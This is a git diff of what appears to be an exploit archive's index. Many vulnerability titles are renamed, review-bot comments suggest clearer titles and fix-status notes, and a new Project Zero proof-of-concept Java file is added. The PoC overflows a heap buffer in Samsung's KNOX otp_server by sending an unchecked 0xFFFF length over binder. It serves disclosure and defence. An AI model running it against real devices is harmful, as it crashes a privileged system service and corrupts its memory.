 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0
@@ -24505,7 +24509,7 @@ id,file,description,date,author,platform,type,port
 16941,platforms/asp/webapps/16941.txt,"EzPub Simple Classic ASP CMS - SQL Injection",2011-03-08,p0pc0rn,asp,webapps,0
 16947,platforms/php/webapps/16947.txt,"WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection",2011-03-09,Shamus,php,webapps,0
-16949,platforms/php/webapps/16949.php,"maian weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
+16949,platforms/php/webapps/16949.php,"Maian Weblog 4.0 - Blind SQL Injection",2011-03-09,mr_me,php,webapps,0
 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0
 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer - Multiple SQL Injections",2011-03-10,p0pc0rn,asp,webapps,0
 16954,platforms/php/webapps/16954.txt,"Keynect eCommerce - SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0
@@ -24711,7 +24715,7 @@ id,file,description,date,author,platform,type,port
 17423,platforms/php/webapps/17423.txt,"WordPress Plugin WPtouch 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0
 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0
 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0
-17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
+17435,platforms/php/webapps/17435.txt,"BrewBlogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0
 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0
 17442,platforms/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal",2011-06-23,xistence,jsp,webapps,0
@@ -29015,8 +29019,8 @@ id,file,description,date,author,platform,type,port
 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - users_profiles.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
 27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - users_mgallery.asp usid Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
 27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0
-27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
-27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
+27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
+27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0
 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - Toast.asp Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0
 27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
 27481,platforms/asp/webapps/27481.txt,"Online Quiz System - student.asp msg Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0
@@ -30755,9 +30759,9 @@ id,file,description,date,author,platform,type,port
 29841,platforms/php/webapps/29841.txt,"PHPFaber TopSites 3 - admin/index.php Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps,0
 29842,platforms/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0
 29844,platforms/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps,0
-29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - iklan.php m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
-29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
-29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - bukutamu.php m_txt Parameter Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
+29845,platforms/php/webapps/29845.txt,"PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
+29846,platforms/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
+29847,platforms/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps,0
 29848,platforms/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,php,webapps,0
 29849,platforms/php/webapps/29849.html,"ToendaCMS 1.5.3 - HTTP Get And Post Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps,0
 29851,platforms/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - Check_login.asp Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps,0
@@ -31303,7 +31307,7 @@ id,file,description,date,author,platform,type,port
 30845,platforms/asp/webapps/30845.txt,"Absolute News Manager .NET 5.1 - getpath.aspx Direct Request Error Message Information",2007-12-04,"Adrian Pastor",asp,webapps,0
 30846,platforms/php/webapps/30846.txt,"phpMyChat 0.14.5 - chat/deluser.php3 LIMIT Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0
 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 - chat/users_popupL.php3 Multiple Parameter Cross-Site Scripting",2007-12-04,beenudel1986,php,webapps,0
-30848,platforms/php/webapps/30848.txt,"Joomla! Component com_content 1.5 RC3 - 'index.php' view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
+30848,platforms/php/webapps/30848.txt,"Joomla! Component Content 1.5 RC3 - 'view' Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
 30849,platforms/php/webapps/30849.txt,"Joomla! Component com_search 1.5 RC3 - 'index.php' Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
 30851,platforms/php/webapps/30851.txt,"VisualShapers EZContents 1.4.5 - File Disclosure",2007-12-05,p4imi0,php,webapps,0
 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 - PHP_SELF Trigger_Error Function Cross-Site Scripting",2007-12-06,imei,php,webapps,0
@@ -31418,8 +31422,8 @@ id,file,description,date,author,platform,type,port
 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
-31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
-31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
+31061,platforms/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
+31062,platforms/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0
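Review bot: The new descriptions for 31061 and 31062 are identical (`Fonality trixbox 2.4.2 - Cross-Site Scripting`), so the two records can no longer be told apart by title; the removed lines named `user/index.php` and `maint/index.php` respectively. Anyone matching this index against a scanner finding or an asset inventory by description would see what looks like one entry listed twice and has to open both files to learn which endpoint each covers. Keeping the script path in the quoted form used elsewhere in this change would preserve the distinction: `Fonality trixbox 2.4.2 - 'user/index.php' Cross-Site Scripting` and `Fonality trixbox 2.4.2 - 'maint/index.php' Cross-Site Scripting`.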
@@ -32158,7 +32162,7 @@ id,file,description,date,author,platform,type,port
 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80
 32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php Filename Parameter) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80
-32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0
+32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0
 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0
 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0
 32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery - images.php Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0
@@ -32210,7 +32214,7 @@ id,file,description,date,author,platform,type,port
 32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 - RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0
 32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0
 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0
-32239,platforms/php/webapps/32239.txt,"Trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0
+32239,platforms/php/webapps/32239.txt,"Fonality trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0
 32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0
 32250,platforms/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0
 32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Inclusion",2008-08-15,Lostmon,php,webapps,0
@@ -32223,7 +32227,7 @@ id,file,description,date,author,platform,type,port
 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0
 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0
-32263,platforms/php/webapps/32263.txt,"Trixbox - 'endpoint_aastra.php mac Parameter' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
+32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Parameter Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@@ -32913,7 +32917,6 @@ id,file,description,date,author,platform,type,port
 33545,platforms/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
 33546,platforms/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0
 33547,platforms/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps,0
-33548,platforms/php/webapps/33548.txt,"THELIA 1.4.2.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,EsSandRe,php,webapps,0
 33550,platforms/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injection",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
 33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection",2010-01-20,Ctacok,php,webapps,0
 33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
@@ -33657,7 +33660,7 @@ id,file,description,date,author,platform,type,port
 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0
 34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0
 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0
-34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0
+34790,platforms/php/webapps/34790.txt,"Pluck CMS 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0
 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0
 34793,platforms/php/webapps/34793.txt,"Top Paidmailer - 'home.php' Remote File Inclusion",2009-07-13,Moudi,php,webapps,0
@@ -34461,7 +34464,7 @@ id,file,description,date,author,platform,type,port
 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 - 'cat' Parameter SQL Injection",2011-09-08,SubhashDasyam,php,webapps,0
 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080
 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80
-36129,platforms/php/webapps/36129.txt,"Pluck 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
+36129,platforms/php/webapps/36129.txt,"Pluck CMS 4.7 - Multiple Local File Inclusion / File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
 36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection",2015-02-20,"K.d Long",xml,webapps,0
 36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 - 'CustomChart.aspx' Cross-Site Scripting",2011-09-12,"Gustavo Roberto",asp,webapps,0
@@ -34525,7 +34528,7 @@ id,file,description,date,author,platform,type,port
 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0
 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0
-36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
+36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
@@ -34581,7 +34584,7 @@ id,file,description,date,author,platform,type,port
 36298,platforms/php/webapps/36298.txt,"Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0
 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0
 36301,platforms/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0
-36302,platforms/php/webapps/36302.txt,"Joomla! Component 'com_content' - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
+36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0
 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80
 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0
@@ -35031,7 +35034,7 @@ id,file,description,date,author,platform,type,port
 36979,platforms/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0
 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0
 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0
-36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0
+36986,platforms/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0
 36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0
 36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0
 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",php,webapps,0
@@ -35575,7 +35578,7 @@ id,file,description,date,author,platform,type,port
 37789,platforms/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0
 37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0
 37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0
-37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
+37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
 37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0
@@ -36356,12 +36359,12 @@ id,file,description,date,author,platform,type,port
 39344,platforms/php/webapps/39344.txt,"ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
 39345,platforms/php/webapps/39345.txt,"ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
 39346,platforms/php/webapps/39346.txt,"ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
-39347,platforms/php/webapps/39347.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
-39348,platforms/php/webapps/39348.txt,"Fonality trixbox - /maint/modules/home/index.php lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
-39349,platforms/php/webapps/39349.txt,"Fonality trixbox - '/maint/modules/asterisk_info/asterisk_info.php' lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
-39350,platforms/php/webapps/39350.txt,"Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
-39351,platforms/php/webapps/39351.txt,"Fonality trixbox - '/maint/modules/endpointcfg/endpointcfg.php' lang Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
-39352,platforms/php/webapps/39352.txt,"Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
+39347,platforms/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
+39348,platforms/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
+39349,platforms/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
+39350,platforms/php/webapps/39350.txt,"Fonality trixbox - 'repo.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
+39351,platforms/php/webapps/39351.txt,"Fonality trixbox - 'endpointcfg.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
+39352,platforms/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80
 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80
 39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80
@@ -36870,3 +36873,4 @@ id,file,description,date,author,platform,type,port
 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
+40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80
diff --git a/platforms/android/dos/40913.java b/platforms/android/dos/40913.java
new file mode 100755
index 000000000..6033c1063
--- /dev/null
+++ b/platforms/android/dos/40913.java
@@ -0,0 +1,64 @@
+/**
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=935
+
+As a part of the KNOX extensions available on Samsung devices, Samsung provides a new service which allows the generation of OTP tokens.
+
+The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e). However, in order to allow easy communication between the Non-secure World (NWD) and the Secure-World (SW) trustlet, a new server has been created. This server, called "otp_server", publishes a binder service called "OTP".
+
+The service provides a single command via binder (command code 2), which allows a client to provide a buffer from the NWD to be sent to the SW. The requests are serialized to the parcel as a 32-bit length field, followed by the actual request data.
+
+However, "otp_server" does not validate the request length field at all, allowing an attacker to specify any value. This length field is then used in a "memcpy" call in order to copy the data from the parcel to an internal heap-allocated buffer.
+
+On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, and the "otp_server" process runs with UID system and context "u:r:otp_server:s0".
+
+I've attached a small PoC which can be used to trigger the overflow. Running it should crash "otp_server".
+*/
+
+package com.example.laginimaineb.otp;
+
+import android.os.IBinder;
+import android.os.Parcel;
+import android.os.RemoteException;
+import android.support.v7.app.AppCompatActivity;
+import android.os.Bundle;
+import android.util.Log;
+
+public class MainActivity extends AppCompatActivity {
+
+ /**
+ * The logtag used.
+ */
+ private static final String LOGTAG = "OTP_TEST";
+
+ /**
+ * The name of the OTP binder service.
+ */
+ private static final String INTERFACE_DESCRIPTOR = "OTP";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+
+ try {
+ //Getting the binder
+ Class smClass = Class.forName("android.os.ServiceManager");
+ IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
+
+ //Creating a connection
+ Parcel parcel = Parcel.obtain();
+ Parcel reply = Parcel.obtain();
+ parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
+ int length = 0xFFFF;
+ parcel.writeInt(length); //Buffer length
+ for (int i = 0; i < length/4 + 1; i++)
+ parcel.writeInt(0xABABABAB);
+ binder.transact(2, parcel, reply, 0);
+ reply.recycle();
+ parcel.recycle();
+
+ } catch (RemoteException ex) {
+ Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
+ }
+ }
+}
diff --git a/platforms/android/dos/40914.java b/platforms/android/dos/40914.java
new file mode 100755
index 000000000..5c416a866
--- /dev/null
+++ b/platforms/android/dos/40914.java
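Review bot: In 40913.java the header comment documents the root cause (a 32-bit request length taken from the parcel and passed to `memcpy` unchecked) but records no fix status and no affected builds beyond the one test device, so a defender cannot tell from this file whether a given firmware is exposed; the header of 40914.java has the same gap. I would add two lines to each header, `Fixed in: <vendor security update, not stated on this page>` and `Remediation: reject a length larger than the destination buffer or the data remaining in the request`. Because both PoCs are expected to end in a crash of otp_server or of the OTP trustlet, an unexpected crash of either is presumably worth alerting on for fleets that may still run unpatched builds.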
@@ -0,0 +1,86 @@
+/**
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=938
+
+As a part of the KNOX extensions available on Samsung devices, Samsung provides a TrustZone trustlet which allows the generation of OTP tokens.
+
